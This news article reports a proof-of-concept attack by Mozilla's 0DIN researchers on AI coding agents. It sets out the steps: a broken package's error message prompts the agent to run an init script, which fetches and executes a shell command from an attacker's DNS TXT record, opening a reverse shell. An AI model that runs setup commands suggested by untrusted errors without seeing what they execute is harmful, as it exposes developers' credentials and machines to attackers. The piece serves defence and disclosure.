Researchers at Mozilla’s Zero Day Investigative Network (0DIN) have published a proof-of-concept attack showing how an AI coding agent can be coerced into executing a malicious payload without any suspicious code present in the cloned repository, without triggering security scanners, and without requiring explicit user approval of a dangerous command.

How the Attack Chain Works

The technique relies on three individually innocuous components that together form a complete attack chain:

  • A clean GitHub repository containing standard setup instructions, installing dependencies via pip3 install -r requirements.txt and initializing the project with python3 -m axiom init.
  • A deliberately broken Python package that refuses to run until initialized, throwing an error that instructs the user to execute python3 -m axiom init. An AI agent like Claude Code interprets this as a routine setup failure and automatically runs the suggested command in an attempt to recover.
  • An initialization script that retrieves a configuration value stored in an attacker-controlled DNS TXT record and executes it as a shell command, delivering the actual payload entirely outside the repository.

The result is an interactive reverse shell running under the developer’s own user privileges. From that position, an attacker gains access to environment variables, API keys, local configuration files, and the ability to establish persistence on the compromised machine.

The Indirection Problem

What makes this technique particularly difficult to detect or defend against is the degree of separation between the agent’s decisions and the eventual harm. As the 0DIN team put it, the reverse shell sits three indirection steps away from anything the agent actually evaluated: an error message it trusted, a shell script that fetched a remote value, and a DNS record the agent never inspected.

Claude Code never chose to open a shell, it chose to fix an error. The agentic behavior that makes these tools useful is precisely what the attack exploits: autonomous error recovery without full visibility into downstream execution.

Distribution Vectors and Mitigations

While this remains a proof-of-concept, 0DIN notes that repositories weaponized in this manner could be distributed convincingly through fake job postings, developer tutorials, blog posts, or direct messages, contexts where a developer might reasonably clone and run an unfamiliar project.

To reduce exposure, 0DIN recommends that AI coding agents be required to disclose their full execution chain for setup commands, including any scripts or values fetched dynamically at runtime. Without that transparency, neither the agent nor the developer has meaningful visibility into what a seemingly routine initialization step is actually doing.